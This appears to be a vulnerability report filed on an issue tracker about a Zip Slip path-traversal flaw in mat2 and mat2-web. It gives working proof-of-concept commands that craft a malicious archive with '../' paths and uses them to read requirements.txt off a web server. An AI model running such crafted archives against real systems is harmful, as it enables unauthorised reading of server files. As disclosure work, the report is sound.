Skip to content

Arbitrary read via malicious zip file

[As received by email, sent by jfriedli]

Heyo

I found an issue in mat2. It is vulnerable to the Zip slip vulnerability.

Here a little summary :)

Create malicious file

Script used to create a Zip Slip file: https://github.com/ptoomey3/evilarc/blob/master/evilarc.py

python2.7 evilarc.py filename_to_extract.txt -d 0 -o "unix" -p "../../../home/kali/Documents/projects"

whereas filename_to_extract.txt is the filename of the file you want to extract from the victim system. Note: it has to be a supported extension by mat2

mat2 evil.zip

and upon extracting the cleaned zip file you receive the file from the victim.

Example Extracting Requirements.txt From Webserver

Create empty target file we want to extract. touch requirements.txt

We know the absolute path of the target file on the server from the Dockerfile.

python2.7 path_tra.py requirements.txt -d 0 -o "unix" -p "../../../var/www/mat2-web/"
Creating evil.zip containing ../../../var/www/mat2-web/requirements.txt

Check if if the path and filename is correct.

cat evilzip
PK�m�T*../../../var/www/mat2-web/requirements.txtPK�m�T*�t2-web/requirements.txtPKXH

Then upload the file via the web interface and download the cleaned zip.

Afterward we unzip it.

unzip evil.cleaned.zip
Archive:  evil.cleaned.zip
warning:  skipped "../" path component(s) in ../../../var/www/mat2-web/requirements.txt
 extracting: var/www/mat2-web/requirements.txt

And we can proof that we received the content of the requirements.txt from the server.

cat var/www/mat2-web/requirements.txt
mutagen==1.45.1
ffmpeg==1.4
bubblewrap==1.2.0
mat2==0.12.4
flask==2.1.2
Flask-RESTful==0.3.9
Flask-Cors==3.0.10
Cerberus==1.3.4
Flask-Testing==0.8.1
blinker==1.4
flasgger==0.9.5
Flask-Assets==2.0
Edited by jvoisin
To upload designs, you'll need to enable LFS and have an admin enable hashed storage. More information